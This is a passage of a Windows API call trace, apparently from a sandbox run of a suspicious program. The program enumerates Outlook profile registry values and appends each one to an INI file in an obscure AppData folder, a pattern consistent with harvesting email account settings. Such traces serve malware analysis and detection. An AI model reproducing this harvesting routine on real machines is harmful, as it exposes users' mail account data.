DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.799] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.799] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.799] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x12, ByteOffset=0x24d3b0*=246, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.799] NtClose (Handle=0xac) returned 0x0 [0106.799] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.799] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, 
ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.799] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.799] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1c, ByteOffset=0x24d3b0*=264, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.799] NtClose (Handle=0xac) returned 0x0 [0106.806] RtlIntegerToChar (in: Value=0x2, Base=0x0, Length=0x20, String=0x24d498 | out: String="2") returned 0x0 [0106.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.807] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 
[0106.807] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.807] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x6, ByteOffset=0x24d3b0*=292, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.807] NtClose (Handle=0xac) returned 0x0 [0106.807] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.807] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.807] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.807] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1a, 
ByteOffset=0x24d3b0*=298, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.807] NtClose (Handle=0xac) returned 0x0 [0106.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.807] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.807] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.807] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x2e, ByteOffset=0x24d3b0*=324, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.807] NtClose (Handle=0xac) returned 0x0 [0106.807] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy 
yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.807] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.807] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.808] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x20, ByteOffset=0x24d3b0*=370, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.808] NtClose (Handle=0xac) returned 0x0 [0106.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.808] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, 
IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.808] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.808] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x14, ByteOffset=0x24d3b0*=402, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.808] NtClose (Handle=0xac) returned 0x0 [0106.808] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x8000001a [0106.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d4d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.808] NtCreateFile (in: FileHandle=0x24d4f0, DesiredAccess=0x12019f, ObjectAttributes=0x24d4b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d4d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d4f0*=0xac, IoStatusBlock=0x24d4d8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.808] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d4d8, FileInformation=0x24d430, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d4d8, FileInformation=0x24d430) returned 0x0 [0106.808] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, 
ApcContext=0x0, IoStatusBlock=0x24d4d8, Buffer=0x106960*, Length=0x4, ByteOffset=0x24d448*=422, Key=0x0 | out: IoStatusBlock=0x24d4d8, Buffer=0x106960*) returned 0x0 [0106.808] NtClose (Handle=0xac) returned 0x0 [0106.808] NtClose (Handle=0xa8) returned 0x0 [0106.808] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x0 [0106.808] NtCreateKey (in: KeyHandle=0x24e180, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e180*=0xa8) returned 0x0 [0106.808] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.808] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: 
FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.808] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.808] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0xc, ByteOffset=0x24d3b0*=426, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.809] NtClose (Handle=0xac) returned 0x0 [0106.809] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.809] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.809] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.809] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x52, ByteOffset=0x24d3b0*=438, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.809] NtClose (Handle=0xac) returned 0x0 
[0106.809] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.809] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.809] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.809] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.809] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x12, ByteOffset=0x24d3b0*=520, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.809] NtClose (Handle=0xac) returned 0x0 [0106.816] RtlIntegerToChar (in: Value=0x797dbfb2, Base=0x0, Length=0x20, String=0x24d498 | out: String="2038284210") returned 0x0 [0106.816] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy 
yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.816] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.816] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.816] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=538, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.816] NtClose (Handle=0xac) returned 0x0 [0106.816] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.816] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.816] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, 
SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.816] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.816] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1a, ByteOffset=0x24d3b0*=562, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.816] NtClose (Handle=0xac) returned 0x0 [0106.816] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.816] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.816] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.816] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, 
IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x24, ByteOffset=0x24d3b0*=588, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.817] NtClose (Handle=0xac) returned 0x0 [0106.817] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.817] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.817] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.817] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1a, ByteOffset=0x24d3b0*=624, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.817] NtClose (Handle=0xac) returned 0x0 [0106.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, 
